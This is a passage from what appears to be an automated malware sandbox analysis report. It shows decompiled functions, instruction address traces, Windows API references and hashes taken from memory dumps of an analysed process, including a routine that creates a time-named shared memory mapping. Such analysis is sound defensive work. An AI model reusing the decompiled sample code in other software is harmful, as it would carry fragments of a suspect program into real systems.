							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x03ed248f
0x03ed2492
0x03ed2498
0x03ed24b6
0x00000000
0x03ed24b6
0x03ed24a0
0x03ed24a9
0x03ed24af
0x03ed24be
0x03ed24c1
0x03ed24c4
0x03ed24ce
0x03ed24ce
0x03ed24d0
0x03ed24d3
0x03ed24d5
0x03ed24d5
0x03ed24d7
0x03ed24da
0x00000000
0x00000000
0x03ed24dc
0x03ed24de
0x03ed2544
0x03ed2544
0x03ed26a2
0x00000000
0x03ed26a2
0x03ed24e0
0x03ed24e0
0x03ed24e4
0x03ed24e6
0x03ed24e6
0x03ed24e6
0x03ed24e6
0x03ed24e9
0x03ed24ea
0x03ed24ed
0x03ed24ed
0x03ed24f1
0x03ed24f5
0x03ed2503
0x03ed2503
0x03ed250b
0x03ed2511
0x03ed2513
0x03ed2515
0x03ed2525
0x03ed2532
0x03ed2536
0x03ed253b
0x03ed253d
0x03ed25bb
0x03ed25bb
0x03ed253f
0x03ed253f
0x03ed253f
0x03ed25bd
0x03ed25bf
0x03ed26a0
0x03ed26a0
0x00000000
0x03ed25c5
0x03ed25c5
0x03ed25cc
0x00000000
0x00000000
0x03ed25d2
0x03ed25d6
0x03ed2632
0x03ed2634
0x03ed263c
0x03ed263e
0x03ed2640
0x00000000
0x00000000
0x03ed2642
0x03ed2648
0x03ed264a
0x03ed264c
0x03ed2661
0x03ed2661
0x03ed2663
0x03ed2692
0x03ed2699
0x00000000
0x03ed2699
0x03ed2667
0x03ed2668
0x03ed266a
0x03ed266c
0x03ed266c
0x03ed266e
0x03ed2670
0x03ed2672
0x03ed2686
0x03ed2686
0x03ed2689
0x03ed268b
0x03ed268b
0x03ed268c
0x03ed268c
0x00000000
0x03ed2674
0x03ed2674
0x03ed2674
0x03ed267d
0x03ed267e
0x03ed2680
0x03ed2682
0x03ed2682
0x00000000
0x03ed2674
0x03ed2672
0x03ed264e
0x03ed2655
0x03ed2655
0x03ed2657
0x00000000
0x00000000
0x03ed2659
0x03ed265a
0x03ed265d
0x03ed265f
0x00000000
0x00000000
0x00000000
0x03ed265f
0x00000000
0x03ed2655
0x03ed25d8
0x03ed25db
0x03ed25e0
0x00000000
0x00000000
0x03ed25e9
0x03ed25eb
0x03ed25f1
0x00000000
0x00000000
0x03ed25f7
0x03ed25fd
0x00000000
0x00000000
0x03ed2603
0x03ed2605
0x03ed260e
0x03ed2612
0x00000000
0x00000000
0x03ed2618
0x03ed261b
0x03ed261d
0x00000000
0x00000000
0x03ed2624
0x03ed2626
0x00000000
0x00000000
0x03ed2628
0x03ed262c
0x00000000
0x00000000
0x00000000
0x03ed262c
0x00000000
0x00000000
0x00000000
0x03ed2517
0x03ed2517
0x03ed2517
0x03ed251e
0x00000000
0x00000000
0x03ed2520
0x03ed2521
0x03ed2523
0x00000000
0x00000000
0x00000000
0x03ed2523
0x03ed254b
0x03ed254d
0x00000000
0x00000000
0x03ed255d
0x03ed255f
0x03ed2561
0x00000000
0x00000000
0x03ed2567
0x03ed256e
0x03ed259a
0x03ed259a
0x03ed259c
0x03ed259e
0x03ed25b2
0x03ed25b4
0x00000000
0x00000000
0x00000000
0x00000000
0x03ed25a0
0x03ed25a0
0x03ed25a0
0x03ed25a9
0x03ed25aa
0x03ed25ac
0x03ed25ae
0x03ed25ae
0x00000000
0x03ed25a0
0x03ed2570
0x03ed2573
0x03ed2575
0x03ed2587
0x03ed2587
0x03ed258a
0x03ed258c
0x03ed258c
0x03ed258d
0x03ed258d
0x03ed2593
0x00000000
0x00000000
0x00000000
0x00000000
0x03ed2577
0x03ed2577
0x03ed2577
0x03ed257e
0x00000000
0x00000000
0x03ed2580
0x03ed2580
0x03ed2581
0x00000000
0x00000000
0x00000000
0x03ed2581
0x03ed2583
0x03ed2585
0x03ed2598
0x00000000
0x00000000
0x00000000
0x03ed2598
0x00000000
0x03ed2585
0x03ed24f7
0x03ed24fa
0x03ed24fd
0x00000000
0x00000000
0x03ed24ff
0x03ed2501
0x00000000
0x00000000
0x00000000
0x03ed2501
0x03ed24c6
0x03ed24c8
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 03ED2536

Memory Dump Source

Source File: 00000008.00000002.596456288.0000000003ED1000.00000020.00020000.sdmp, Offset: 03ED0000, based on PE: true

Associated: 00000008.00000002.596445184.0000000003ED0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.596471290.0000000003ED3000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.596487361.0000000003ED5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.596497555.0000000003ED6000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 478ce1edbe4003bbfe719ffa96e634ad132fb57f26764018d8d061cf526fd012
Instruction ID: a8c3b0bdbd73e2ea789813b310a964e9ad9aab159cfe421ca198da192b8d7188
Opcode Fuzzy Hash: 478ce1edbe4003bbfe719ffa96e634ad132fb57f26764018d8d061cf526fd012
Instruction Fuzzy Hash: 8561FA31A006069FDF19CF2DD490B69B3B5EB94318F28AF78DA25C7284E731D843CA51

Uniqueness

Uniqueness Score: -1.00%

Function 03EEFB78, Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

EnumSystemLocalesA.KERNEL32(Function_000107DF,00000001), ref: 03EEFB91

Memory Dump Source

Source File: 00000008.00000002.596525604.0000000003EDF000.00000020.00020000.sdmp, Offset: 03EDF000, based on PE: false

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: b06d823eeb56950e4c238f0b466e24136eea73bc31a311da8334e1eaf773de25
Instruction ID: 5a17209ac34ca9bc0d969bcdcf05f2b166c04bacaa201057d3c40d568eef4384
Opcode Fuzzy Hash: b06d823eeb56950e4c238f0b466e24136eea73bc31a311da8334e1eaf773de25
Instruction Fuzzy Hash: A4D05E70E107008FE7105E75D9487A177A4FB10B1AF649A4DDD5240481C3B494C68A00

Uniqueness

Uniqueness Score: -1.00%

Function 03EE5C73, Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

csm, xrefs: 03EE5D69

Memory Dump Source

Source File: 00000008.00000002.596525604.0000000003EDF000.00000020.00020000.sdmp, Offset: 03EDF000, based on PE: false

Similarity

API ID:
String ID: csm
API String ID: 0-1018135373
Opcode ID: 068e60879e5192328de1201ec4ae7649ff3f69152b01bb5e9fbe5bf7b50d262d
Instruction ID: 2e91221e63337bc0d3f7ef7f8fea51f581ee3382f575d678ef1bee3b2b34a9d6
Opcode Fuzzy Hash: 068e60879e5192328de1201ec4ae7649ff3f69152b01bb5e9fbe5bf7b50d262d
Instruction Fuzzy Hash: A4518138204301CFD724DF29C494A6BB7E2AF8521CF589B6DE8968B3E5CB71E845CB51

Uniqueness

Uniqueness Score: -1.00%

Function 03EF1398, Relevance: .5, Instructions: 527COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.596525604.0000000003EDF000.00000020.00020000.sdmp, Offset: 03EDF000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a9c6fc3c87772c9461e265a44a7a4a96cb25e8c83ad408dcc71d02b9ad9506d
Instruction ID: 8650d2658f7d23ae03e3bdc3e20f73dc35d3e62c2748ae10a18a58a08b6ef0df
Opcode Fuzzy Hash: 8a9c6fc3c87772c9461e265a44a7a4a96cb25e8c83ad408dcc71d02b9ad9506d
Instruction Fuzzy Hash: 2A026233D497F78F8B71CEB940E056ABAB05E0169430F97E9DEC02F296D256DD0986E0

Uniqueness

Uniqueness Score: -1.00%

Function 03EF246B, Relevance: .4, Instructions: 384COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.596525604.0000000003EDF000.00000020.00020000.sdmp, Offset: 03EDF000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction ID: ff00fc79ca2b6941cc3c0d5578bfbfe4b06145cd60f53cabcb9c019716f25cef
Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction Fuzzy Hash: EDD17F77C0AAF38E8B35C12E516417EEE726FD1A8431FD7E19ED02F28992AA5D0095D0

Uniqueness

Uniqueness Score: -1.00%

Function 03EF204B, Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.596525604.0000000003EDF000.00000020.00020000.sdmp, Offset: 03EDF000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction ID: 16964dca6f1bcd3bcdf77f13dd1659a7b74b851b562ae957b29557c3d6ccdd04
Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction Fuzzy Hash: 51D18177D0AAF38E8735C12E415817EEE726FD1A8431ED7E18ED03F289D6AA9D0085D0

Uniqueness

Uniqueness Score: -1.00%

Function 03EF1C3F, Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.596525604.0000000003EDF000.00000020.00020000.sdmp, Offset: 03EDF000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction ID: 607f82a4aecab73aa8b4ec0374327a64d1a86b8c54a3a0fbe415c735312e1526
Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction Fuzzy Hash: D3C17073C0AAF78E8735C12E416826EEA726FD1B9931FD3E08DD43F289926B5C0485D0

Uniqueness

Uniqueness Score: -1.00%

Function 03EF186B, Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.596525604.0000000003EDF000.00000020.00020000.sdmp, Offset: 03EDF000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction ID: 2ab43e8a20591fad7bc36ca830b8a58ba621820a46f7cba1ee795aabbd906372
Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction Fuzzy Hash: 8DC17E73D0AAF7CE8735C12E41582AFEA726FD1A8431ED3E18DD42F289D1AA5D0486D0

Uniqueness

Uniqueness Score: -1.00%

Function 03EDFB80, Relevance: .4, Instructions: 350COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.596525604.0000000003EDF000.00000020.00020000.sdmp, Offset: 03EDF000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62ec8c5d25e6816ad7cac04e9b05521e0cec350482a431c84dc9fcc80ac6c6c3
Instruction ID: c20c2a4de53dea711ea3974da382a91758ce48a98342118a66685a3096e236f7
Opcode Fuzzy Hash: 62ec8c5d25e6816ad7cac04e9b05521e0cec350482a431c84dc9fcc80ac6c6c3
Instruction Fuzzy Hash: 32F14879900058EFD318EF7CF4B1A697BF2ABA82047098A39F44A9736DD7346845CF50

Uniqueness

Uniqueness Score: -1.00%

Function 03EE7131, Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.596525604.0000000003EDF000.00000020.00020000.sdmp, Offset: 03EDF000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fcc1ea49960309a3f7d89badbc5f5a886f75740285f7379595ec14f633c50ed
Instruction ID: dece8fb560f6ea16720e3b29106f41ac47ed1a282de818bdca814a4144a1acca
Opcode Fuzzy Hash: 6fcc1ea49960309a3f7d89badbc5f5a886f75740285f7379595ec14f633c50ed
Instruction Fuzzy Hash: E231032DA0428345DF7CE93CD1447F6D2B2C70C669FCCB33AED8682958E6158883CA86

Uniqueness

Uniqueness Score: -1.00%

Function 03ED2264, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E03ED2264(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E03ED23CB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E03ED2485(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E03ED2370(_t55, _t66);
										_t89 = _t66 + 0x10;
										E03ED23CB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E03ED2467(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x03ed2268
0x03ed2269
0x03ed226a
0x03ed226d
0x03ed226f
0x03ed2272
0x03ed2273
0x03ed2275
0x03ed2276
0x03ed2277
0x03ed227a
0x03ed2284
0x03ed2335
0x03ed233c
0x03ed2345
0x03ed228a
0x03ed228a
0x03ed2290
0x03ed2296
0x03ed2299
0x03ed229c
0x03ed22a0
0x03ed22a5
0x03ed22aa
0x03ed232a
0x00000000
0x03ed22ac
0x03ed22ac
0x03ed22b8
0x03ed22ba
0x03ed2315
0x03ed2315
0x03ed231b
0x00000000
0x03ed22bc
0x03ed22cb
0x03ed22cd
0x03ed22ce
0x03ed22cf
0x03ed22d2
0x03ed22d2
0x03ed22d4
0x00000000
0x03ed22d6
0x03ed22d6
0x03ed2320
0x03ed22d8
0x03ed22d8
0x03ed22dc
0x03ed22e4
0x03ed22e9
0x03ed22ee
0x03ed22fa
0x03ed2302
0x03ed2309
0x03ed230f
0x03ed2313
0x00000000
0x03ed2313
0x03ed22d6
0x03ed22d4
0x00000000
0x03ed22ba
0x03ed232e
0x03ed232e
0x03ed232e
0x03ed22aa
0x03ed234a
0x03ed2351

Memory Dump Source

Source File: 00000008.00000002.596456288.0000000003ED1000.00000020.00020000.sdmp, Offset: 03ED0000, based on PE: true

Associated: 00000008.00000002.596445184.0000000003ED0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.596471290.0000000003ED3000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.596487361.0000000003ED5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.596497555.0000000003ED6000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: 81d018294947ba50a3ef47c5adec15e4adf11d5b4d0cd942d0ad10026d9e9cd8
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: CE21B6369002059BCB15DF68C8809ABF7B5FF48354B499668DE199B245D730F916C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 03F421A5, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.596618254.0000000003F42000.00000040.00020000.sdmp, Offset: 03F42000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction ID: db4a0320126190a3558fb22a38df6e07ebd4d845dc4ab075da4141d1b511ef27
Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction Fuzzy Hash: 5911E673340204AFD714CE59DCC0EA2B7EAEB88230B2984AAED04CB311D635E841C760

Uniqueness

Uniqueness Score: -1.00%

Function 03F4259E, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.596618254.0000000003F42000.00000040.00020000.sdmp, Offset: 03F42000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction ID: 53992694edb3f81a3bb15fcefb44ae03091ea9fd439e13ee027aa28448340ede
Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction Fuzzy Hash: 1B01F133315241AFC718CF2DE9A4D79BFE8EBC1620B19847EE547C3A15E220E841CA20

Uniqueness

Uniqueness Score: -1.00%

Function 03EF8E8C, Relevance: 25.6, APIs: 17, Instructions: 128COMMON

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 03EF8EC3
DName::operator+.LIBCMT ref: 03EF8ECA
DName::operator+.LIBCMT ref: 03EF8ED1
UnDecorator::getBasicDataType.LIBCMT ref: 03EF8EDA
DName::operator+=.LIBCMT ref: 03EF8F04
UnDecorator::getDimension.LIBCMT ref: 03EF8F16
operator+.LIBCMT ref: 03EF8F22
DName::operator+.LIBCMT ref: 03EF8F2C
DName::operator+=.LIBCMT ref: 03EF8F35
operator+.LIBCMT ref: 03EF8F64
DName::operator+.LIBCMT ref: 03EF8F6E
DName::operator+.LIBCMT ref: 03EF8F75
DName::operator=.LIBCMT ref: 03EF8F7E
UnDecorator::getPrimaryDataType.LIBCMT ref: 03EF8F8B
DName::DName.LIBCMT ref: 03EF8FA0
operator+.LIBCMT ref: 03EF8FD7
DName::operator+.LIBCMT ref: 03EF8FE1

Memory Dump Source

Source File: 00000008.00000002.596525604.0000000003EDF000.00000020.00020000.sdmp, Offset: 03EDF000, based on PE: false

Similarity

API ID: Name::operator+$Decorator::getoperator+$DataNameName::Name::operator+=Type$BasicDimensionName::operator=Primary
String ID:
API String ID: 943562707-0
Opcode ID: 753bcdf09dc583272e97747b20050a3f81755fbc857db1dde60714ad957007f5
Instruction ID: e1786a1c2fa16612f03afcf0e896d4124dea3c874fdf155b74a75a04cd4a2344
Opcode Fuzzy Hash: 753bcdf09dc583272e97747b20050a3f81755fbc857db1dde60714ad957007f5
Instruction Fuzzy Hash: 1D417F76A00708AEDF11E6A0CC45FFF77BCAB44614F04566AE705AB1C0EFB4E6448B61

Uniqueness

Uniqueness Score: -1.00%

Function 03EEB1C4, Relevance: 21.1, APIs: 14, Instructions: 109memorythreadCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(03F3E534,?,03EE3AFF), ref: 03EEB1CA
__mtterm.LIBCMT ref: 03EEB1D6

Part of subcall function 03EEAEA2: __decode_pointer.LIBCMT ref: 03EEAEB3
Part of subcall function 03EEAEA2: TlsFree.KERNEL32(03F44824,03EEB343), ref: 03EEAECD

TlsAlloc.KERNEL32 ref: 03EEB263
__init_pointers.LIBCMT ref: 03EEB288
__encode_pointer.LIBCMT ref: 03EEB293
__encode_pointer.LIBCMT ref: 03EEB2A3
__encode_pointer.LIBCMT ref: 03EEB2B3
__encode_pointer.LIBCMT ref: 03EEB2C3
__decode_pointer.LIBCMT ref: 03EEB2E4
__calloc_crt.LIBCMT ref: 03EEB2FD
__decode_pointer.LIBCMT ref: 03EEB317
__initptd.LIBCMT ref: 03EEB326
GetCurrentThreadId.KERNEL32 ref: 03EEB32D

Memory Dump Source

Source File: 00000008.00000002.596525604.0000000003EDF000.00000020.00020000.sdmp, Offset: 03EDF000, based on PE: false

Similarity

API ID: __encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThread__calloc_crt__init_pointers__initptd__mtterm
String ID:
API String ID: 2061501447-0
Opcode ID: 9dd50ae65ae7f65121d9197ff0e96c145f3584a4a65136dc3fdecaf2927f7d3a
Instruction ID: c5b4a215431276c4516a065e31cc3371d2a1f5c94dedea562847d1aee7d10736
Opcode Fuzzy Hash: 9dd50ae65ae7f65121d9197ff0e96c145f3584a4a65136dc3fdecaf2927f7d3a
Instruction Fuzzy Hash: ED31BFB9A843069FC710FF79BA5564A7AA5EF95B16704133AF420B6190FB7D8840CE90

Uniqueness

Uniqueness Score: -1.00%

Function 03EE53B0, Relevance: 15.1, APIs: 10, Instructions: 91COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 03EE53C6

Part of subcall function 03EEB5A1: __calloc_impl.LIBCMT ref: 03EEB5AF
Part of subcall function 03EEB5A1: Sleep.KERNEL32(00000000,03EEAFC8,00000001,00000214), ref: 03EEB5C6

__calloc_crt.LIBCMT ref: 03EE53E9
__calloc_crt.LIBCMT ref: 03EE5405
__copytlocinfo_nolock.LIBCMT ref: 03EE542A
__setlocale_nolock.LIBCMT ref: 03EE5439
___removelocaleref.LIBCMT ref: 03EE5445
___freetlocinfo.LIBCMT ref: 03EE544C
__setmbcp_nolock.LIBCMT ref: 03EE5464
___removelocaleref.LIBCMT ref: 03EE5479
___freetlocinfo.LIBCMT ref: 03EE5480

Memory Dump Source

Source File: 00000008.00000002.596525604.0000000003EDF000.00000020.00020000.sdmp, Offset: 03EDF000, based on PE: false

Similarity

API ID: __calloc_crt$___freetlocinfo___removelocaleref$Sleep__calloc_impl__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
String ID:
API String ID: 2969281212-0
Opcode ID: e2bca26cffb0ea7dbbe18592638bc83f60d415a1952cb22080c4c045522cff93
Instruction ID: 61a7cd98758607112b4bae5c63d7934e39c0dd48d0a6233df0dc273c631cb052
Opcode Fuzzy Hash: e2bca26cffb0ea7dbbe18592638bc83f60d415a1952cb22080c4c045522cff93
Instruction Fuzzy Hash: EE21A739108302EFEB21FF66E800D5AB7F5DF86719F24A61DE4859A1D4DF71D8008A55

Uniqueness

Uniqueness Score: -1.00%

Function 03EF2A18, Relevance: 13.7, APIs: 9, Instructions: 165COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(00000001,03F04288,00000001,?,00000100,?,?,?,?,?,03EF2BFE,?,?,?,?,?), ref: 03EF2A45
GetLastError.KERNEL32(?,03EF2BFE,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 03EF2A57
_malloc.LIBCMT ref: 03EF2AF1
_memset.LIBCMT ref: 03EF2B11
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 03EF2B34
__freea.LIBCMT ref: 03EF2B3E
___ansicp.LIBCMT ref: 03EF2B68
___convertcp.LIBCMT ref: 03EF2B89

Part of subcall function 03EFDAAB: _strlen.LIBCMT ref: 03EFDB2B
Part of subcall function 03EFDAAB: _memset.LIBCMT ref: 03EFDBA3
Part of subcall function 03EFDAAB: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,03EF2BFE), ref: 03EFDBD5

GetStringTypeA.KERNEL32(?,?,?,?,?,00000100,?,?,?,?,?,03EF2BFE,?,?,?,?), ref: 03EF2BA9

Memory Dump Source

Source File: 00000008.00000002.596525604.0000000003EDF000.00000020.00020000.sdmp, Offset: 03EDF000, based on PE: false

Similarity

API ID: StringType$_memset$ByteCharErrorLastMultiWide___ansicp___convertcp__freea_malloc_strlen
String ID:
API String ID: 3363058749-0
Opcode ID: 0728a019fcdbb503f0debfd8cc81333787d0474de55551119002a9b024650268
Instruction ID: 83afe3aa6b48e1432cadcf3457c88a7a41149270552f502c75905a49bfa9cb5f
Opcode Fuzzy Hash: 0728a019fcdbb503f0debfd8cc81333787d0474de55551119002a9b024650268
Instruction Fuzzy Hash: 4A519F7950020AAFDF21DF69DC809AE7BB9EB08358B185A29FF15D7150D7B4C960CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03EE54A8, Relevance: 13.6, APIs: 9, Instructions: 99COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 03EE54FB
__lock.LIBCMT ref: 03EE5511
__copytlocinfo_nolock.LIBCMT ref: 03EE5523
__setlocale_nolock.LIBCMT ref: 03EE5538
__lock.LIBCMT ref: 03EE556D
___removelocaleref.LIBCMT ref: 03EE5585
_sync_legacy_variables_lk.LIBCMT ref: 03EE55BE

Part of subcall function 03EE5B1F: __getptd_noexit.LIBCMT ref: 03EE5B1F

Part of subcall function 03EE5AA7: __decode_pointer.LIBCMT ref: 03EE5AB0

Memory Dump Source

Source File: 00000008.00000002.596525604.0000000003EDF000.00000020.00020000.sdmp, Offset: 03EDF000, based on PE: false

Similarity

API ID: __lock$___removelocaleref__calloc_crt__copytlocinfo_nolock__decode_pointer__getptd_noexit__setlocale_nolock_sync_legacy_variables_lk
String ID:
API String ID: 1358582686-0
Opcode ID: fc9974c8c5703df542e137b13f0da9a0478bebe9c3e313bf470a9579a309e36b
Instruction ID: 2d13d22b3e8965494aa36ed4e684a35803a2680ba218e5e5fbe31663494343d4
Opcode Fuzzy Hash: fc9974c8c5703df542e137b13f0da9a0478bebe9c3e313bf470a9579a309e36b
Instruction Fuzzy Hash: 9A31F379A043089BDF10FFA498817AC77B1AF02328F24662EE4256F2C1CF74D6059B25

Uniqueness

Uniqueness Score: -1.00%

Function 03ED1979, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E03ED1979(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L03ED2210();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x3ed41d0;
				_push(_t15 + 0x3ed505e);
				_push(_t15 + 0x3ed5054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L03ED220A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t34 = CreateFileMappingW(0xffffffff, 0x3ed41c0, 4, 0, _t18,  &_v60);
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0);
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x03ed1979
0x03ed1982
0x03ed1986
0x03ed198c
0x03ed1991
0x03ed1996
0x03ed1999
0x03ed199c
0x03ed19a1
0x03ed19a2
0x03ed19a5
0x03ed19b0
0x03ed19b7
0x03ed19bb
0x03ed19bd
0x03ed19be
0x03ed19c1
0x03ed19c6
0x03ed19d0
0x03ed19d2
0x03ed19d2
0x03ed19ec
0x03ed19f0
0x03ed1a40
0x03ed19f2
0x03ed19fb
0x03ed1a11
0x03ed1a19
0x03ed1a2b
0x03ed1a2f
0x00000000
0x00000000
0x03ed1a1b
0x03ed1a1e
0x03ed1a23
0x03ed1a25
0x03ed1a25
0x03ed1a06
0x03ed1a08
0x03ed1a31
0x03ed1a32
0x03ed1a32
0x03ed19fb
0x03ed1a48

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,03ED176E,0000000A,?,?), ref: 03ED1986
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 03ED199C
_snwprintf.NTDLL ref: 03ED19C1
CreateFileMappingW.KERNEL32(000000FF,03ED41C0,00000004,00000000,?,?), ref: 03ED19E6
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,03ED176E,0000000A,?), ref: 03ED19FD
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 03ED1A11
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,03ED176E,0000000A,?), ref: 03ED1A29
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,03ED176E,0000000A), ref: 03ED1A32
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,03ED176E,0000000A,?), ref: 03ED1A3A

Memory Dump Source

Source File: 00000008.00000002.596456288.0000000003ED1000.00000020.00020000.sdmp, Offset: 03ED0000, based on PE: true

